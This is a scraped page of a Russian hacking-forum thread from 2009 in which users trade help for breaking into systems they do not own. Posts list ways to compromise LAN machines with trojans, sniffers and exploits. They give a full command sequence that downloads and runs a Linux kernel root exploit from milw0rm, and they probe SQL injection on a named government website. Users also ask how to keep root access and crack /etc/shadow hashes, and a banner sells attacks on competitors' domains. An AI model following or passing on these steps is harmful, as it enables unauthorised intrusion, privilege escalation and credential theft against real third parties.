Ваши вопросы по уязвимостям.

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 1070 из 2438

1070

Опции темы

Поиск в этой теме

Опции просмотра

#10691

10.12.2009, 17:43

Solide Snake

Постоянный

Регистрация: 28.04.2007

Сообщений: 547

С нами: 10019906

Репутация: 3702

Цитата:

Сообщение от Jessi Parker

Как взломать комп по LAN.
P.S. Спрашиваю чисто в учебных целях)))

1 Запустить троян на удалённый комп
- найти приват трой или купить его билд.
- послать ссылку с ****** / либо тупо впарить.
2 Использовать Сплоиты
- найти свежую дырку (в баг листах)
- ну и естественно придётся порты сканить на наличие уязвимых сервисов.
3 Сканеры расшаренных ресурсов + сканеры портов и т.п.
- берём сканер заряжаем свой диапазон и в путь. Есть p2p-сеть значит многие расшарили свои диски.
4 Снифание трафика.
- вешаем снифер и ловим пароли.
5 Можно взломать роутер.

#10692

10.12.2009, 17:44

[Forest]

Новичок

Регистрация: 07.11.2009

Сообщений: 23

С нами: 8688843

Репутация: 10

Есть шелл на сервер. Нада получить рута. Беру этот сплойт:

http://www.woneninjeelement.nl/images/stories/2.4.x%20and%202.6.x.txt (рутать надо не этот сайт)

При копмиляции выдаёт кучу ошибок

Может нужно сплойт подправить, хз

ядро - Linux 2.6.18 . Подскажите что можно сделать... мб нужно другой сплойт?

Последний раз редактировалось [Forest]; 10.12.2009 в 17:48..

#10693

10.12.2009, 17:57

mailbrush

Познавший АНТИЧАТ

Регистрация: 24.06.2008

Сообщений: 1,996

С нами: 9410786

Репутация: 2731

Код:

uname -a

Покажи что выводит данная команда.
Если ядро обновлено до 13 августа этого года, то используй эксплоит sock_sendpage - http://milw0rm.com/exploits/9641

Юзать примерно так:

Код:

cd /tmp
mkdir my
chmod 777 my
cd my
wget http://milw0rm.com/sploits/2009-linux-sendpage3.tar.gz
tar xvfz 2009-linux-sendpage3.tar.gz
chmod 777 linux-sendpage3 -R
cd linux-sendpage3
./run
id

#10694

10.12.2009, 18:03

[Forest]

Новичок

Регистрация: 07.11.2009

Сообщений: 23

С нами: 8688843

Репутация: 10

Цитата:

Сообщение от mailbrush

Код:

uname -a

Код:

cd /tmp
mkdir my
chmod 777 my
cd my
wget http://milw0rm.com/sploits/2009-linux-sendpage3.tar.gz
tar xvfz 2009-linux-sendpage3.tar.gz
chmod 777 linux-sendpage3 -R
cd linux-sendpage3
./run
id

./run
mmap: Permission denied

#10695

10.12.2009, 18:24

mailbrush

Познавший АНТИЧАТ

Регистрация: 24.06.2008

Сообщений: 1,996

С нами: 9410786

Репутация: 2731

Значит патченное ядро.

#10696

10.12.2009, 19:03

547

Участник форума

Регистрация: 11.10.2009

Сообщений: 116

С нами: 8728261

Репутация: 211

http://www.pz.gov.ua/login/login.php?lid=1
при подставлении кавычки в поле логин...

шибка во время выполнения запроса: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1

а так

http://www.pz.gov.ua/login/login.php?lid=-1

ORA-00936: missing expression

это как понимать? один сайт работает на разных БД?

#10697

10.12.2009, 19:26

.:[melkiy]:.

Постоянный

Регистрация: 25.01.2009

Сообщений: 368

С нами: 9100556

Репутация: 912

Цитата:

Сообщение от 547

_http://forum.antichat.ru/showpost.php?p=1725903&postcount=11344

#10698

10.12.2009, 20:05

547

Участник форума

Регистрация: 11.10.2009

Сообщений: 116

С нами: 8728261

Репутация: 211

Цитата:

Сообщение от .:[melkiy]:.

_http://forum.antichat.ru/showpost.php?p=1725903&postcount=11344

ну там еще и мускуль...

#10699

10.12.2009, 20:41

Jessi Parker

Новичок

Регистрация: 10.12.2009

Сообщений: 2

С нами: 8642003

Репутация: 0

Цитата:

Сообщение от Solide Snake

Спс, половину не понял. Дальше буду Гуглить.

#10700

10.12.2009, 21:02

.:[melkiy]:.

Постоянный

Регистрация: 25.01.2009

Сообщений: 368

С нами: 9100556

Репутация: 912

Получил рута через бэк-коннект. Как теперь сделать чтобы смог подключиться через putty? Мб расшифровать хэш рута с /etc/shadow? Есть еще какие-то способы?

Страница 1070 из 2438

1070

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход